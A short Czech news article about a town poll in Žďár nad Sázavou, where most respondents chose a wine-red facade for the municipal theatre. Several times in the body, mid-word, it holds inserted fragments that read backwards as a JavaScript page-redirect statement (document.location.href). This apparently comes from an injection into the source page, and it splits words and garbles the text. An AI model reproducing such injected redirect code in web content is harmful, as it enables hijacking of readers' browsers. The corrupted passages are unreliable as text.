Rainbow page separator

Lidé se v anketě přiklonili k vínové barvě divadla

Pátek, 13. února 2015

Hlasování o barvě městského divadla

Žďár nad Sázavou / Celkem 587 respondentů hlasovalo v anketě žďárské radnice, kterou vyhlásila v souvislosti s barvou fasády divadla.
„Z celkového počtu bylo 164 papírových anketních lístků, ostatní respondenti hlasovali prostřednictvím internetu,“ uvedl žďárský starosta Zdeněk Navrátil s tím, že nejvíce hlasujících, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 430, se přiklonilo k vínově červené barvě fasády. Podle jeho slov se taktéž ozvali odborníci, kteří naopak názor většiny hlasující veřejnosti nesdíleli.
Debatu o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, jakou barvu bude mít žďárské divadlo, čeká pokračování. „V březnu se uskuteční výběrové řízení na dodavatele stavby a v dubnu musíme říct konečné slovo ohledně barvy,“ poznamenal starosta. „Díky diskusi se zároveň učíme komunikovat s veřejností a jsme rádi, že se obyvatelé města mají zájem v anketách angažovat,“ dodal Navrátil.
Ze všech respondentů, kteří se zapojili do veřejné ankety, byli žďárskou módní návrhářkou Bea[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Rajskou vylosováni tři výherci – dva od zástupců radnice získají vstupenku do relaxačního centra, třetí od Beaty Rajské její knihu Ústřižky.

Městské divadlo Žďár nad Sázavou